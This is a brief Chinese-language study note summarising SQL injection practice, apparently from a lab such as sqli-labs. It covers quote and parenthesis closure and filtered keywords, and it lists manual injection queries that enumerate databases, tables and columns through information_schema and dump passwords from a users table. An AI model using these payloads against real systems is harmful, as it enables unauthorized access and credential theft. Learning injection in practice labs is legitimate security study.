sql注入的小总结
- 只允许第一个命令输出问题(即union后面的命令不生效的问题)
- 单引号闭合的问题
- 双引号闭合的问题
- 单双引号加小括号闭合的问题
- union等关键字被过滤问题
- 手工注入命令的学习
查询数据库名:
(select group_concat(schema_name) from information_schema.schemata)
查询数据表名:
select group_concat(table_name) from information_schema.tables where table_schema=database()%23
查询列名:
select group_concat(column_name) from information_schema.columns where table_name=表名%23
查数据:
select group_concat(password) from security.users